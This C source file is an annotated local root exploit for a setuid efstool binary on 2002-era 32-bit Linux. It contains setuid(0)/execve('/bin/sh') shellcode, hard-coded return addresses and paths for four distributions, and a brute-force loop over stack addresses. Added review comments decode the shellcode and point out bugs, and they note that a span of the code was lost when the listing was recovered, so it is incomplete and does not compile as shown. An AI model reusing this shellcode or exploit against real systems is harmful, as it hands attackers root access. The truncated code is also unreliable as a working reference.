/*
 * efstool local exploit (brute force capabilities)
 *
 * http://www.t3chware.net, email: root@t3chware.net
 * coded by: Hi_Tech_Assassin
 *
 * Review notes (added): classic stack-smashing exploit for a 32-bit x86 Linux
 * efstool binary. It hands the target an oversized argument carrying the
 * shellcode below plus a guessed return address, and can brute-force that
 * address by re-running the target with a sliding guess. The listing was
 * recovered from a web page: the header names of the #include lines were
 * eaten as HTML tags, and a span of code between "for(i=0;i" in exploit()
 * and "=-3000))" in bruteforce() is missing. All remaining tokens are kept
 * byte-for-byte; only comments were added. The addresses and shellcode
 * target 2002-era distributions and assume no NX, ASLR or stack canaries.
 */

/* Header names lost in extraction -- TODO restore. The code below uses
 * printf/perror, fork/waitpid/exit, getopt/optarg, atoi and system(), so
 * stdio.h, stdlib.h, unistd.h, sys/types.h and sys/wait.h are the likely set. */
#include
#include
#include
#include
#include

#define NOP 0x90   /* x86 one-byte nop, presumably used to pad the payload (sled) */
#define LEN 3000   /* size of the attack string handed to the target */

/*
 * Linux/x86 shellcode followed by the string "/bin/sh". Decodes as:
 *   xor eax,eax; xor ebx,ebx; mov al,0x17; int 0x80     -> setuid(0)
 *   jmp/call/pop to locate "/bin/sh", NUL-terminate it, build argv
 *   mov al,0x0b; int 0x80                              -> execve("/bin/sh", argv, envp)
 *   xor ebx,ebx; mov eax,ebx; inc eax; int 0x80        -> exit(0)
 * The setuid(0) up front is what turns a setuid-root efstool into a root
 * shell; it writes into itself (the terminator and argv), so it must land
 * in writable memory such as the stack.
 */
char shellcode[]=
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Per-distribution presets: a hard-coded guess for the return address
 * (a stack address in the 0xbfff.... range of a pre-ASLR 32-bit kernel)
 * and the path of the efstool binary. Selected by 1-based index from main(). */
struct {
    int no;          /* 1-based menu number; must match the position in target[] */
    char *descr;     /* human-readable distribution name */
    long ret;        /* address written over the saved return address */
    char path[256];  /* absolute path of the efstool binary to run */
}target[] = {
    {1," Redhat 7.2", 0xbffff340,"/usr/bin/efstool"},
    {2," SuSE Linux 8.0",0xbfffeb43 ,"/opt/gnome/bin/efstool"},
    {3," Mandrake 8.2", 0xbffff080,"/usr/bin/efstool"},
    {4," Slackware 8.1", 0xbffff080,"/usr/bin/efstool"}
};

/* Returns the current stack pointer as the starting point for address guesses.
 * x86-32 only. It relies on the asm leaving the value in %eax and on the
 * function falling off its end without a return statement -- using the result
 * is undefined behaviour in C and only happens to work with GCC unoptimised. */
long esp(void) { __asm("movl %esp,%eax"); }

/*
 * exploit(): presumably fills payload (NOP sled + shellcode + repeated ret)
 * and executes the target with it. Only its first line survived extraction.
 *   ret  - return address to write over the saved return address
 *   path - target binary; callers pass a char[256] cast to char **, so the
 *          double pointer looks like a typo for char * that the casts in
 *          main() paper over rather than fix
 */
void exploit(long ret, char **path) {
    char payload[LEN];
    int i;
    /* !!! TRUNCATED: the web page dropped everything from the "<" of this
     * loop condition up to the ">" of bruteforce()'s while() condition: the
     * payload-filling loop, the exec of the target, the end of exploit(),
     * the usage() function (not visible anywhere in the recovered text) and
     * the head of bruteforce() -- its signature, the declarations of pid, x,
     * offset and ret, and the while() header. The tokens that follow belong
     * to the body of bruteforce()'s loop. */
    for(i=0;i=-3000)) {
        if((pid=fork())==0) {
            exploit(ret,path);   /* child: one attempt with the current guess */
            exit(0);
        }
        /* BUG: the parent takes this branch on every successful fork (pid > 0),
         * so "fork failed" is printed each iteration and a real failure
         * (pid == -1) is not distinguished; waitpid(-1, ...) then reaps any
         * child. The test should be pid < 0. */
        else perror("fork failed");
        /* Status is discarded, so nothing here detects a successful attempt;
         * the loop only ends when x leaves the search window. */
        if(waitpid(pid,NULL, 0)!= pid) perror("waitpid error");
        /* Sliding search around the esp() guess: step ret upward by `offset`
         * while x >= 0, re-seed from esp() with x = -1 once x reaches 3000,
         * then step downward. Whether an overshoot past 3000 still reaches the
         * first branch depends on the (missing) while() condition -- if it is
         * x<=3000, an offset that does not divide 3000 ends the loop instead. */
        if(x>=3000) { ret=esp(); x=-1; }
        else if(x<=3000&&x>=0) { ret+=offset; x+=offset; }
        else if(x>=-3000&&x<0) { ret-=offset; x-=offset; }
        printf("%d\n\n",x);  /* progress: current displacement from the esp() guess */
    }
    printf("brute force complete..\n\n");
    /* Runs in the parent, whose uid was never changed by any child, so this
     * only shows who ran the tool, not whether an attempt got a root shell.
     * It also spawns via /bin/sh (system()) where exec would do. */
    system("id");
}

/*
 * main(): option parsing; each option acts immediately, in command-line order.
 *   -t N  attack preset N (1..4) with its hard-coded return address
 *   -b X  brute-force the return address for the preset chosen by an earlier -t
 *         (the optstring makes -b take an argument, but it is never read)
 *   -o N  use esp()+N as the return address -- see the note on -o below
 * Review notes:
 *  - `sel` is never initialised; `-b` without a preceding `-t` indexes
 *    target[sel-1] with an indeterminate value.
 *  - atoi() results are not range-checked: -t 0, -t 5 or non-numeric text
 *    indexes outside the 4-entry target[] array.
 *  - `-o` stores the offset in a `char *`, adds it to esp() as pointer
 *    arithmetic, then reuses the same optarg as the preset number, so the
 *    offset and the preset index are forced to be the same value.
 *  - usage() is called once with (char **)argv[0] (a char * cast to char **)
 *    and once with &argv[0]; its definition is not in the recovered text.
 *  - getopt() returns -1 at the end of the options; EOF happens to equal -1
 *    on common C libraries but is the wrong constant to compare against.
 */
int main(int argc, char **argv) {
    int cnt, sel;
    char *offset;
    long returnaddr;
    if(argc == 1) {
        usage((char **)argv[0]);
        exit(1);
    }
    while((cnt = getopt(argc,argv,"t:b:o:")) != EOF) {
        switch(cnt) {
        case 't': /* target distro */
            sel = atoi(optarg);
            exploit(target[sel-1].ret,(char **)target[sel-1].path);
            break;
        case 'b': /* brute force: uses whichever preset -t selected earlier */
            bruteforce((char **)target[sel-1].path);
            break;
        case 'o': /* offset from esp(); the same argument doubles as the preset number */
            offset = atoi(optarg);
            returnaddr=esp()+offset;
            sel = atoi(optarg);
            exploit(returnaddr,(char **)target[sel-1].path);
            break;
        default:
            usage(&argv[0]);
            break;
        }
    }
    return(0);
}